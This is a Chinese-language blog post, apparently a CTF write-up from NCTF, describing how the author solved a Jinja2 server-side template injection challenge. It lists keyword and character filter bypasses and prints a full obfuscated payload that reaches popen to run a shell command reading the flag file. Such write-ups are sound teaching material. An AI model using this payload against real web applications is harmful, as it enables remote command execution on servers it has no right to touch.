前言
第一次参加南邮的NCTF,表示题目出的质量很好,出题人也很好,平台也很好,交flag也不需要验证码(逃~),总的来说就是好,明年还会参加。
见证了过了1天PWN仍然0解的状况,南邮的PWN还是强啊。
总榜第一队伍里的师傅还是强啊,但是为什么是梅子酒不是郁离歌呢?(逃~):
Web题目的质量还是挺高的,虽然我不会。。。今年只能做出来最简单的那道SSTI,争取明年能再创新高。。
WP
F12看源码,发现了?name=master,url传一下发现回显了,大概率是SSTI,经过测试是Jinja2的SSTI,然后正常注入,发现过滤了一些一般的payload中所需要的东西:
- 过滤了单引号,用双引号来绕过
- 过滤了点 . ,用[]来绕过
- 过滤了下划线_,用\x5f来绕过
- 过滤了class,base,subclasses这些,用+进行字符串的拼接来绕过。
最终的payload如下:
?name={{""["\x5f\x5fcla"+"ss\x5f\x5f"]["\x5f\x5fba"+"se\x5f\x5f"]["\x5f\x5fsubcl"+"asses\x5f\x5f"]()[117]["\x5f\x5fin"+"it\x5f\x5f"]["\x5f\x5fgl"+"obals\x5f\x5f"]["po"+"pen"]("cat wo\x5fta\x5fniang\x5fde\x5fbu\x5fshi\x5fni\x5fde\x5ffla9")["read"]()}}
总结
前一篇博客刚说过不水博客,结果又水了一篇。。。虽然这题已经被日穿了,谁让自己只会这题呢。。。